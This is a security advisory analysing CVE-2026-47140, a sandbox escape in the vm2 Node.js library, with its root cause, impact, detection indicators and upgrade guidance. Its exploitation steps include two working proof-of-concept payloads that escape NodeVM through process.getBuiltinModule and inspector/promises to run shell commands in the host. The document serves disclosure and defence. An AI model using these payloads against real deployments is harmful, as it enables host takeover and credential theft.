CVE-2026-47140: 
JavaScript Analisi e mitigazione delle vulnerabilità

CVE-2026-47140 is a critical sandbox escape vulnerability in vm2, an open-source Node.js VM/sandbox library, titled "NodeVM builtin denylist bypass via process and inspector/promises allows host code execution." The flaw affects all versions of vm2 up to and including 3.11.3, and was patched in version 3.11.4. It was first published by the maintainer on May 18, 2026, and added to the GitHub Advisory Database on May 29, 2026. The vulnerability carries a CVSS v3.1 base score of 10.0 (Critical) (Github Advisory, Feedly).

The root cause is an incomplete denylist (CWE-693: Protection Mechanism Failure; CWE-184: Incomplete List of Disallowed Inputs) in lib/builtin.js, where NodeVM's DANGEROUS_BUILTINS set used exact-match logic and omitted two critical Node.js builtins: process and inspector/promises. Because non-denied builtins are exposed to the sandbox via builtins.set(key, special ? special : vm => vm.readonly(hostRequire(key))), sandboxed code can call require('process').getBuiltinModule('child_process') (available in Node.js 22+) to reload any core module regardless of the embedder's allow/deny configuration, or call require('inspector/promises').Session().post('Runtime.evaluate', ...) to evaluate arbitrary JavaScript in the host process. The subpath form inspector/promises did not match the exact-match inspector denylist entry, allowing it to slip through. A proof-of-concept was included in the advisory and tested on vm2 3.11.2 with Node.js v25.9.0 (Github Advisory, Patch Commit).

Successful exploitation allows an attacker who can execute untrusted JavaScript inside a NodeVM instance to fully escape the sandbox and execute arbitrary code in the host Node.js process. This can result in complete compromise of the application process, including reading and writing arbitrary files, spawning host child processes, accessing environment secrets, and enabling lateral movement within the host environment. The scope change (S:C in CVSS) reflects that the impact extends beyond the sandboxed component to the host system. This vulnerability is only exploitable when the NodeVM configuration allows process, inspector/promises, or the wildcard '*' in require.builtin; the default configuration with require disabled is not affected (Github Advisory).

1. Identify a vulnerable target: Locate an application using vm2 versions ≤ 3.11.3 with a NodeVM configuration that allows process, inspector/promises, or the wildcard '*' in require.builtin (e.g., builtin: ['*', '-child_process', '-inspector']).
2. Craft a sandbox escape payload using process.getBuiltinModule: Submit untrusted JavaScript to the NodeVM instance that calls require('process').getBuiltinModule('child_process') to reload child_process in the host realm, bypassing the denylist:

const cp = require('process').getBuiltinModule('child_process');
module.exports = cp.execFileSync('/bin/sh', ['-c', 'id']).toString();

3. Alternative: Exploit inspector/promises subpath: Use the Inspector protocol to evaluate arbitrary JavaScript in the host process:

const { Session } = require('inspector/promises');
const s = new Session();
s.connect();
s.post('Runtime.evaluate', { expression: '/* attacker-controlled host-realm JS */' });

4. Achieve host code execution: Either method results in arbitrary command execution or JavaScript evaluation in the host Node.js process, with the privileges of the running Node.js service, enabling file access, process spawning, credential theft, or further lateral movement (Github Advisory, Patch Commit).

• Logs: Node.js application logs showing calls to require('process').getBuiltinModule(...) or require('inspector/promises') originating from sandboxed code; unexpected Runtime.evaluate Inspector protocol calls in debug/trace logs.
• Process: Unexpected child processes (e.g., /bin/sh, cmd.exe, curl, wget) spawned by the Node.js process running vm2; unusual process trees with the Node.js service as parent.
• File System: New or modified files in application directories created by the Node.js process; unexpected scripts, web shells, or cron jobs written by the service account.
• Network: Outbound connections from the Node.js server to unexpected external IPs or domains, potentially indicating reverse shell or data exfiltration activity following sandbox escape.
• Application Behavior: NodeVM instances accepting user-supplied code that reference process, inspector/promises, or use getBuiltinModule in submitted scripts (Github Advisory).

Upgrade vm2 to version 3.11.4 or later, which adds process to the DANGEROUS_BUILTINS set and promotes denylist matching to family-prefix logic via isDangerousBuiltin(key), blocking inspector/promises and all future subpath variants. The fix is enforced at both the BUILTIN_MODULES wildcard expansion path and the addDefaultBuiltin explicit-allowlist path. As an interim workaround, avoid using builtin: ['*'] or any configuration that explicitly allows process or inspector/promises in NodeVM; restrict require.builtin to only the specific modules your application requires. Review all NodeVM configurations for use of the wildcard '*' and audit submitted code for references to these builtins (Github Advisory, vm2 Release).

Heise Online covered the vulnerability as part of a broader report on four critical (CVSS 10.0) security gaps closed in vm2, noting the significance of maximum-severity sandbox escapes in a widely used Node.js library (Heise Online). SecurityOnline.info published a dedicated write-up on the vm2 sandbox escape vulnerabilities, highlighting the RCE risk (SecurityOnline). BeyondMachines.net also flagged the issue as a critical sandbox escape enabling remote code execution (BeyondMachines). Red Hat tracked the issue via Bugzilla, indicating downstream impact assessment for Red Hat products (Red Hat Bugzilla).